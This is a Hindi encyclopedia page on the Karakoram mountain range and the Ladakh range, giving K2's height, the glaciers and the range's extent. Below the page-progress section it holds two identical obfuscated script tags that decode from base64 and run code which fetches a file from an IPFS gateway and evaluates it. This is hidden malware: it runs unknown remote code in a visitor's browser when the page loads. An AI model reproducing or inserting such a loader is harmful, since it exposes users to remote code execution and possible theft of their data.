कराकोरम पर्वतश्रेणी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
कराकोरम पर्वतश्रेणी

कराकोरम पर्वतश्रेणी भारतीय क्षेत्र से पाकिस्तानी भूमि तक फैली हुई, ग्रेनाइट-पट्टिताश्म का विशाल पर्वत पिंड है।

  • इसमें संसार की सर्वोच्च चोटियों में से कुछ हैं, जिसमें से एक के-दो है, जिसकी ऊँचाई 8,611 मीटर है।
  • कम से कम 30 अन्य चोटियाँ 7,315 मीटर से अधिक ऊँची हैं।
  • यह पर्वतमाला, जो बड़े भारी ग्लेशियरों से पटी पड़ी है, शुष्क और वीरान पठारों से ऊपर उभरी हुई हैं।
  • विषम तापमान और विखंडित चट्टानों के मलबे इसकी विशेषताएँ हैं।
  • कराकोरम को 'दुनिया की छत' कहा जाना बिल्कुल उचित प्रतीत होता है।

लद्दाख पर्वत श्रृंखला

  • लद्दाख पर्वत श्रृंखला कराकोरम श्रृंखला का एक हिस्सा है।
  • यह उत्तरी पाकिस्तान में श्योक नदी के उद्गम स्थल से शुरू होकर उत्तरी भारत से गुज़रता हुआ 370 किमी दक्षिण-पूर्व में तिब्बत (चीन) सीमा तक फैला हुआ है।
  • लगभग 6,100 मीटर की शीर्ष रेखा वाली यह श्रृंखला सिंधु नदी के पूर्वोत्तर तट के समानांतर स्थित है। उत्तरी पाकिस्तान में सिंधु नदी के दक्षिण-पूर्व में स्थित देवसई पहाड़ियों को कभी-कभी इस श्रृंखला का हिस्सा मान लिया जाता है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वीथिका

टीका टिप्पणी और संदर्भ

संबंधित लेख